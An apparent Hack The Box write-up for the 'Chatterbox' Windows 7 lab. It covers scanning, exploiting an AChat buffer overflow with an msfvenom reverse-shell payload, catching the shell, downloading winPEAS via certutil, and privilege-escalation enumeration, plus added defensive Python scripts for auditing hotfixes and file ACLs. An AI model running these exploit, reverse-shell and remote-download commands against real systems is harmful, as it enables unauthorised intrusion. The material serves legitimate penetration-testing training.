Enumeration
Nmap scan output – full scan
# Nmap 7.94SVN scan initiated Fri Nov 10 07:23:29 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/HTB/chatterbox/results/10.10.10.74/scans/_full_tcp_nmap.txt -oX /home/kali/HTB/chatterbox/results/10.10.10.74/scans/xml/_full_tcp_nmap.xml 10.10.10.74
Increasing send delay for 10.10.10.74 from 0 to 5 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for 10.10.10.74
Host is up, received user-set (0.30s latency).
Scanned at 2023-11-10 07:23:37 EST for 1303s
Not shown: 65525 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp open http syn-ack AChat chat system httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
|_http-favicon: Unknown favicon MD5: 0B6115FAE5429FEB9A494BEE6B18ABBE
9256/tcp open achat syn-ack AChat chat system
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49155/tcp open msrpc syn-ack Microsoft Windows RPC
49156/tcp open msrpc syn-ack Microsoft Windows RPC
49157/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Chatterbox
| NetBIOS computer name: CHATTERBOX\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-11-10T12:45:04-05:00
|_clock-skew: mean: 6h39m59s, deviation: 2h53m13s, median: 4h59m58s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 38735/tcp): CLEAN (Couldn't connect)
| Check 2 (port 52613/tcp): CLEAN (Couldn't connect)
| Check 3 (port 64306/udp): CLEAN (Failed to receive data)
| Check 4 (port 20347/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-11-10T17:45:06
|_ start_date: 2023-11-10T17:23:14
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 10 07:45:20 2023 -- 1 IP address (1 host up) scanned in 1311.13 seconds
Checking SMB with CME:
╭─kali@kali ~/HTB/chatterbox
╰─$ crackmapexec smb 10.10.10.74 -u '' -p '' --shares
SMB 10.10.10.74 445 CHATTERBOX [*] Windows 7 Professional 7601 Service Pack 1 (name:CHATTERBOX) (domain:Chatterbox) (signing:False) (SMBv1:True)
SMB 10.10.10.74 445 CHATTERBOX [+] Chatterbox\:
SMB 10.10.10.74 445 CHATTERBOX [-] Error enumerating shares: STATUS_ACCESS_DENIED
╭─kali@kali ~/HTB/chatterbox
╰─$
We will try to enumerate 9256/tcp (AChat chat system).
Checking on searchsploit:
╭─kali@kali ~/HTB/chatterbox
╰─$ searchsploit chat
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
123 Flash Chat 5.0 - Remote Code Injection | php/webapps/27121.txt
123 Flash Chat 7.8 - Multiple Vulnerabilities | php/webapps/34481.txt
123 FlashChat 7.8 - Multiple Vulnerabilities | windows/remote/14658.txt
12Planet Chat Server 2.5 - Error Message Installation Full Path Disclosure | multiple/remote/22497.txt
12Planet Chat Server 2.9 - Cross-Site Scripting | multiple/remote/24253.txt
Achat 0.150 beta7 - Remote Buffer Overflow | windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)
We will try 36025:
╭─kali@kali ~/HTB/chatterbox
╰─$ searchsploit -m windows/remote/36025.py
Exploit: Achat 0.150 beta7 - Remote Buffer Overflow
URL: https://www.exploit-db.com/exploits/36025
Path: /usr/share/exploitdb/exploits/windows/remote/36025.py
Codes: CVE-2015-1578, CVE-2015-1577, OSVDB-118206, OSVDB-118104
Verified: False
File Type: Python script, ASCII text executable, with very long lines (637)
Copied to: /home/kali/HTB/chatterbox/36025.py
╭─kali@kali ~/HTB/chatterbox
╰─$
In the code:
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x9>
#Payload size: 512 bytes
We create a reverse shell payload.
We know it is 32-bit from the following enumeration:
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Gathering OS architecture for 1 machines
[*] Socket connect timeout set to 2 secs
10.10.10.74 is 32-bit
We will create a reverse shell as below:
╰─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.16 LPORT=444 EXITFUNC=thread -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3822 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51"
buf += b"\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
We add this to the Python script and set up a listener on 444.
We run the exploit:
╭─kali@kali ~/HTB/chatterbox
╰─$ python2 ./36025.py
---->{P00F}!
╭─kali@kali ~/HTB/chatterbox
╰─$
We get a shell:
listening on [any] 444 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.74] 49159
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
We get the flag:
dir
Volume in drive C has no label.
Volume Serial Number is 502F-F304
Directory of C:\Users
12/10/2017 09:21 AM <DIR> .
12/10/2017 09:21 AM <DIR> ..
12/10/2017 01:34 PM <DIR> Administrator
12/10/2017 09:18 AM <DIR> Alfred
04/11/2011 09:21 PM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 3,678,101,504 bytes free
C:\Users>cd alfred
cd alfred
C:\Users\Alfred>cd desktop
cd desktop
C:\Users\Alfred\Desktop>type users.flag
type users.flag
The system cannot find the file specified.
C:\Users\Alfred\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 502F-F304
Directory of C:\Users\Alfred\Desktop
12/10/2017 06:50 PM <DIR> .
12/10/2017 06:50 PM <DIR> ..
11/12/2023 07:49 AM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 3,678,101,504 bytes free
C:\Users\Alfred\Desktop>type user.txt
type user.txt
ae48274817f8eec1c2c0e4a2b6a4cce3
C:\Users\Alfred\Desktop>
Privilege Escalation
whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
================= =============================================
chatterbox\alfred S-1-5-21-1218242403-4263168573-589647361-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
C:\Users\Alfred\Desktop>
systeminfo
\Users\Alfred\Desktop>systeminfo
systeminfo
Host Name: CHATTERBOX
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00371-222-9819843-86663
Original Install Date: 12/10/2017, 9:18:19 AM
System Boot Time: 11/12/2023, 7:49:15 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,591 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,646 MB
Virtual Memory: In Use: 449 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\CHATTERBOX
H
[142]: KB3101722
[143]: KB3102429
[144]: KB3107998
[145]: KB3108371
[146]: KB3108381
[147]: KB3108664
[148]: KB3109103
[149]: KB3109560
[150]: KB3110329
[151]: KB3118401
[152]: KB3122648
[153]: KB3123479
[154]: KB3126587
[155]: KB3127220
[156]: KB3133977
[157]: KB3137061
[158]: KB3138378
[159]: KB3138612
[160]: KB3138910
[161]: KB3139398
[162]: KB3139914
[163]: KB3140245
[164]: KB3147071
[165]: KB3150220
[166]: KB3150513
[167]: KB3156016
[168]: KB3156019
[169]: KB3159398
[170]: KB3161102
[171]: KB3161949
[172]: KB3161958
[173]: KB3172605
[174]: KB3177467
[175]: KB3179573
[176]: KB3184143
[177]: KB3185319
[178]: KB4014596
[179]: KB4019990
[180]: KB4040980
[181]: KB976902
[182]: KB982018
[183]: KB4054518
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection 4
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.74
Check with the Windows Exploit Suggester:
╭─kali@kali ~/HTB/chatterbox/Windows-Exploit-Suggester ‹master●›
╰─$ python2 ./windows-exploit-suggester.py --database 2023-10-18-mssb.xls --systeminfo sys.txt 1 ↵
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 183 hotfix(es) against the 381 potential bulletins(s) with a database of 137 known exploits
[*] there are now 175 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 SP1 32-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*] https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*]
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*] https://github.com/foxglovesec/RottenPotato
[*] https://github.com/Kevin-Robertson/Tater
[*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*]
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*] https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*] https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*]
[E] MS16-056: Security Update for Windows Journal (3156761) - Critical
[*] https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9 JavaScriptStackWalker Memory Corruption (MS15-056)
[*] http://blog.skylined.nl/20161206001.html -- MSIE jscript9 JavaScriptStackWalker memory corruption
[*]
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[*] https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
[*] https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
[*] https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC
[*]
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[*] Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC
[*]
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[*] https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC
[*] https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*] https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*]
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[*] http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060), PoC
[*] http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*] https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*] https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*]
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*] http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*]
[*] done
╭─kali@kali ~/HTB/chatterbox/Windows-Exploit-Suggester ‹master●›
we will try — https://www.exploit-db.com/exploits/39432
We can check the dates of the hotfixes:
:\>wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic qfe get Caption,Description,HotFixID,InstalledOn
Caption Description HotFixID InstalledOn
http://go.microsoft.com/fwlink/?LinkId=133041 Update KB2849697 12/10/2017
http://go.microsoft.com/fwlink/?LinkId=133041 Update KB2849696 12/10/2017
http://go.microsoft.com/fwlink/?LinkId=133041 Update KB2841134 12/10/2017
http://support.microsoft.com/ Update KB2670838 12/10/2017
http://support.microsoft.com/?kbid=2830477 Update KB2830477 12/10/2017
http://support.microsoft.com/ Update KB2592687 12/10/2017
http://support.microsoft.com/?kbid=2479943 Security Update KB2479943 12/10/2017
We download the exploit, copy it to the working directory and compile it.
We try to compile but it fails:
╭─kali@kali ~/HTB/chatterbox
╰─$ gcc 39432.c 39432
39432.c:16:1: error: unknown type name ‘using’
16 | using System;
| ^~~~~
After research we will use Mono.
We installed it with:
sudo apt-get update
sudo apt-get install mono-complete
We compile:
╭─kali@kali ~/HTB/chatterbox
╰─$ mcs 39432.c
╭─kali@kali ~/HTB/chatterbox
╰─$ ls
36025.py 39432.c 39432.exe results Windows-Exploit-Suggester
╭─kali@kali ~/HTB/chatterbox
╰─$
We serve this file and pull it to the box.
Serving:
╭─kali@kali ~/HTB/chatterbox
╰─$ serve 9000
The tun0 IP is 10.10.14.16 and the eth0 IP is 192.168.1.5.
Starting HTTP server on port 9000...
Serving HTTP on 0.0.0.0 port 9000 (http://0.0.0.0:9000/) ...
I have uploaded and attempted this but it failed, and looking at the hotfixes I have seen:
Microsoft released the patch for MS16-016 on February 9, 2016
The machine was last updated on
http://support.microsoft.com/?kbid=4054518 Security Update KB4054518 1/10/2018
None of the kernel exploits would work due to the hotfixes.
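As an added example (not part of the original write-up, and not code from Windows-Exploit-Suggester), the following Python script reproduces the hotfix-date reasoning above: it parses `wmic qfe` rows into KB identifiers and install dates, finds the most recent install date, and classifies a bulletin as patched, likely patched (a later update is installed) or possibly unpatched. The sample rows are constructed from the output on this page; the MS16-016 release date (9 February 2016) and its package number (3136041) are the ones stated on this page; the function names and the three-way classification are my own.

```python
"""Audit a Windows hotfix list against a security-bulletin release date.

Added example, not part of the original write-up. The sample rows below are
constructed from the 'wmic qfe' output on this page; function names are mine.
"""
import re
from datetime import date, datetime

# Constructed sample in the layout of:
#   wmic qfe get Caption,Description,HotFixID,InstalledOn
SAMPLE_QFE = """Caption                                      Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=2479943   Security Update  KB2479943  12/10/2017
http://support.microsoft.com/                Update           KB2670838  12/10/2017
http://support.microsoft.com/?kbid=4054518   Security Update  KB4054518  1/10/2018
"""

# Bulletin release dates: the page states MS16-016 shipped on 9 Feb 2016 and
# the exploit-suggester output lists its package as 3136041.
BULLETIN_RELEASE = {"MS16-016": date(2016, 2, 9)}
BULLETIN_KB = {"MS16-016": "KB3136041"}

# A data row ends with the hotfix id followed by its US-format install date.
ROW = re.compile(r"(KB\d+)\s+(\d{1,2}/\d{1,2}/\d{4})\s*$")


def parse_qfe(text):
    """Return [(hotfix_id, installed_on_date), ...] from wmic qfe output."""
    hotfixes = []
    for line in text.splitlines():
        m = ROW.search(line.rstrip())
        if m:
            installed = datetime.strptime(m.group(2), "%m/%d/%Y").date()
            hotfixes.append((m.group(1), installed))
    return hotfixes


def latest_install(hotfixes):
    """Most recent InstalledOn date, or None if the list is empty."""
    return max((d for _, d in hotfixes), default=None)


def is_installed(hotfixes, kb):
    """True if the given KB id appears in the parsed hotfix list."""
    return any(h == kb for h, _ in hotfixes)


def assess(hotfixes, bulletin):
    """Classify a bulletin for this host.

    'patched'            - the bulletin's own KB is present
    'likely patched'     - updates were installed after the bulletin shipped,
                           so a later rollup will normally have carried the fix
    'possibly unpatched' - nothing newer than the bulletin is installed
    """
    if is_installed(hotfixes, BULLETIN_KB[bulletin]):
        return "patched"
    newest = latest_install(hotfixes)
    if newest is not None and newest > BULLETIN_RELEASE[bulletin]:
        return "likely patched"
    return "possibly unpatched"


if __name__ == "__main__":
    hf = parse_qfe(SAMPLE_QFE)
    print("last update:", latest_install(hf))
    for b in BULLETIN_RELEASE:
        print(b, "->", assess(hf, b))
```

Run against a real `wmic qfe` dump, the "likely patched" result for a host last updated in January 2018 is the same conclusion the write-up reaches by hand; the "possibly unpatched" branch is what a patch-management check would alert on.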
Serving, uploading and running winPEAS:
C:\temp>certutil -urlcache -split -f http://10.10.14.16:9000/winPEASx86.exe c:\temp\winPEASx86.exe
certutil -urlcache -split -f http://10.10.14.16:9000/winPEASx86.exe c:\temp\winPEASx86.exe
**** Online ****
000000 ...
247200
CertUtil: -URLCache command completed successfully.
C:\temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is 502F-F304
Directory of C:\temp
11/12/2023 09:03 AM <DIR> .
11/12/2023 09:03 AM <DIR> ..
11/12/2023 09:03 AM 2,388,480 winPEASx86.exe
1 File(s) 2,388,480 bytes
2 Dir(s) 3,661,963,264 bytes free
C:\temp>winPEASx86.exe systeminfo
winPEASx86.exe systeminfo
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
We didn't find anything as yet.
On enumeration of scheduled tasks via:
C:\> schtasks /query /tn vulntask /fo list /v
HostName: CHATTERBOX
TaskName: \Reset AChat service
Next Run Time: 11/12/2023 9:16:00 AM
Status: Ready
Logon Mode: Interactive only
Last Run Time: 11/12/2023 9:15:39 AM
Last Result: 0
Author: CHATTERBOX\Alfred
Task To Run: "C:\Users\Alfred\AppData\Local\Microsoft\Windows Media\reset.bat"
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: CHATTERBOX\Alfred
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: One Time Only, Minute
Start Time: 5:10:40 PM
Start Date: 1/30/2018
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: 0 Hour(s), 1 Minute(s)
Repeat: Until: Time: None
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
On further checking of the bat file we see AChat.exe, which is running as admin:
C:\Users\Alfred\AppData\Local\Microsoft\Windows Media>type reset.bat
type reset.bat
taskkill /f /im AChat.exe & start /min "" "c:\Program Files\AChat\AChat.exe"
C:\Users\Alfred\AppData\Local\Microsoft\Windows Media>icacls c:\Program Files\AChat\AChat.exe
icacls c:\Program Files\AChat\AChat.exe
Invalid parameter "Files\AChat\AChat.exe"
C:\Users\Alfred\AppData\Local\Microsoft\Windows Media>cd c:\Program Files\AChat\
cd c:\Program Files\AChat\
c:\Program Files\AChat>dir
dir
Volume in drive C has no label.
Volume Serial Number is 502F-F304
Directory of c:\Program Files\AChat
12/10/2017 09:20 AM <DIR> .
12/10/2017 09:20 AM <DIR> ..
01/24/2007 11:07 PM 2,851,328 AChat.exe
12/10/2017 09:20 AM 54 AChat.url
10/17/2006 05:26 PM 365,568 AutoUp.exe
01/24/2007 11:44 PM 81,538 default.po
12/06/2005 04:53 PM 29,058 license.rtf
12/10/2017 09:20 AM <DIR> sounds
12/10/2017 09:20 AM 3,065 unins000.dat
12/10/2017 09:20 AM 678,682 unins000.exe
7 File(s) 4,009,293 bytes
3 Dir(s) 3,340,738,560 bytes free
c:\Program Files\AChat>icacls AChat.exe
icacls AChat.exe
AChat.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
c:\Program Files\AChat>
The folder where the bat file is located is readable/writable:
Directory of C:\Users\Alfred\AppData\Local\Microsoft\Windows Media
01/30/2018 03:59 PM <DIR> .
01/30/2018 03:59 PM <DIR> ..
12/10/2017 09:18 AM <DIR> 12.0
01/30/2018 05:12 PM 76 reset.bat
1 File(s) 76 bytes
3 Dir(s) 3,341,156,352 bytes free
C:\Users\Alfred\AppData\Local\Microsoft\Windows Media>echo test > temp.txt
echo test > temp.txt
C:\Users\Alfred\AppData\Local\Microsoft\Windows Media>icacls reset.bat
icacls reset.bat
reset.bat NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
CHATTERBOX\Alfred:(I)(F)
Successfully processed 1 files; Failed processing 0 files
C:\Users\Alfred\AppData\Local\Microsoft\Windows Media>del temp.txt
del temp.txt
C:\Users\Alfred\AppData\Local\Microsoft\Windows Media>
The above was a rabbit hole.
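The check that closes this rabbit hole, as an added example that is not part of the original write-up: a scheduled task is only an escalation path if its target can be modified by a principal less privileged than the account the task runs as. Here the task runs as CHATTERBOX\Alfred and reset.bat is writable only by Alfred, SYSTEM and Administrators, so nobody gains anything by tampering with it. The Python below parses icacls output and reports any such principals; the sample ACLs are constructed from the icacls output shown above, and the WRITE_RIGHTS and PRIVILEGED tables and the function names are my own assumptions.

```python
"""Flag scheduled-task targets writable by principals below the task's account.

Added example, not part of the original write-up. Sample ACLs are constructed
from the icacls output on this page; the rights/principal tables and function
names are my own assumptions.
"""
import re

# icacls simple rights that allow changing a file's contents (full, modify, write).
WRITE_RIGHTS = {"F", "M", "W", "WD", "GA", "GW"}
# Principals treated as already privileged: their write access is not an escalation.
PRIVILEGED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\ADMINISTRATORS"}

# One ACE: a principal followed by one or more parenthesised flag groups.
ACE = re.compile(
    r"(NT AUTHORITY\\[^:\s]+|BUILTIN\\[^:\s]+|Everyone|[^\s\\:]+\\[^:\s]+)"
    r":((?:\([^)]*\))+)"
)

# Constructed from the 'icacls' output shown above.
ACHAT_EXE_ACL = """AChat.exe NT AUTHORITY\\SYSTEM:(I)(F)
          BUILTIN\\Administrators:(I)(F)
          BUILTIN\\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
"""
RESET_BAT_ACL = """reset.bat NT AUTHORITY\\SYSTEM:(I)(F)
          BUILTIN\\Administrators:(I)(F)
          CHATTERBOX\\Alfred:(I)(F)
Successfully processed 1 files; Failed processing 0 files
"""


def parse_icacls(text):
    """Parse icacls output into {PRINCIPAL: set(flags)} (principals upper-cased)."""
    acl = {}
    for who, flags in ACE.findall(text):
        groups = re.findall(r"\(([^)]*)\)", flags)
        if "DENY" in groups:
            continue  # deny ACEs grant nothing; they are simply not counted here
        rights = {t.strip() for g in groups for t in g.split(",") if t.strip()}
        acl.setdefault(who.upper(), set()).update(rights)
    return acl


def writers(acl):
    """Principals whose allow ACEs include a write-capable right."""
    return {who for who, rights in acl.items() if rights & WRITE_RIGHTS}


def escalation_risk(acl, run_as):
    """Principals that could modify the target and so run code as `run_as`.

    A writer is excluded when it is SYSTEM/Administrators or is the task
    account itself, since neither gains anything by tampering with the file.
    """
    run_as = run_as.upper()
    return {who for who in writers(acl) if who not in PRIVILEGED and who != run_as}


if __name__ == "__main__":
    # The page's task '\Reset AChat service' runs as CHATTERBOX\Alfred.
    for name, acl_text in (("reset.bat", RESET_BAT_ACL), ("AChat.exe", ACHAT_EXE_ACL)):
        risk = escalation_risk(parse_icacls(acl_text), "CHATTERBOX\\Alfred")
        print(name, "->", "no escalation path" if not risk else sorted(risk))
```

The same function applied with `run_as` set to NT AUTHORITY\SYSTEM would flag Alfred's full control over reset.bat, which is the configuration a hardening review should look for: a task running as a privileged account whose script or binary lives in a user-writable location.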
Some AutoLogon credentials found from winPEAS:
Home folders found
C:\Users\Administrator : Alfred [AllAccess]
